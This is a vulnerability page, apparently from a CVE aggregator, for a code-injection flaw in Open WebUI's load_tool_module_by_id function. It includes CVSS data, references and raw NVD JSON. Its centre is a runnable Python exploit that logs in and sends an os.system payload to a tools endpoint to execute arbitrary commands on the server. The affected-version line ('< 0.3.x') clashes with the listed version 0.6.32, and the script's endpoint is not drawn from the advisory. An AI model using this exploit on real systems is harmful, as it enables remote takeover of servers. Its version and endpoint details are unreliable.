CVE-2026-0766

Description

Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:* - VULNERABLE

Open WebUI < 0.3.x (vulnerable versions with load_tool_module_by_id function)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-0766 PoC - Open WebUI Command Injection
# Target: Open WebUI with vulnerable load_tool_module_by_id function

TARGET_URL = "http://target:8080"
USERNAME = "attacker"
PASSWORD = "password123"

def exploit(target_url, username, password, command):
    """
    Exploit CVE-2026-0766 by injecting Python code via load_tool_module_by_id
    
    Args:
        target_url: Base URL of vulnerable Open WebUI instance
        username: Valid low-privilege user account
        password: Password for the user account
        command: System command to execute on target
    """
    session = requests.Session()
    
    # Step 1: Authenticate to obtain session
    login_url = f"{target_url}/api/v1/auth/login"
    login_data = {
        "username": username,
        "password": password
    }
    
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print(f"[-] Authentication failed: {response.status_code}")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Inject malicious Python code via load_tool_module_by_id
    # The vulnerability allows execution of arbitrary Python code
    exploit_payload = f"__import__('os').system('{command}')"
    
    exploit_url = f"{target_url}/api/v1/tools/load"
    exploit_data = {
        "module_id": exploit_payload,
        "action": "load_module"
    }
    
    response = session.post(exploit_url, json=exploit_data)
    
    if response.status_code == 200:
        print(f"[+] Command executed successfully: {command}")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 5:
        print("Usage: python cve_2026_0766_poc.py <target_url> <username> <password> <command>")
        sys.exit(1)
    
    exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0766
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0766
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0766/
[4] VulDB https://vuldb.com/cve/CVE-2026-0766
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-032/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0766", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:03.527", "lastModified": "2026-01-30T19:47:56.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código en load_tool_module_by_id de Open WebUI. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Open WebUI. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la función load_tool_module_by_id. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar código Python. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de la cuenta de servicio. Fue ZDI-CAN-28257."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:*", "matchCriteriaId": "2B5D5634-470E-499C-A7C3-A5FD7277D287"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-032/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}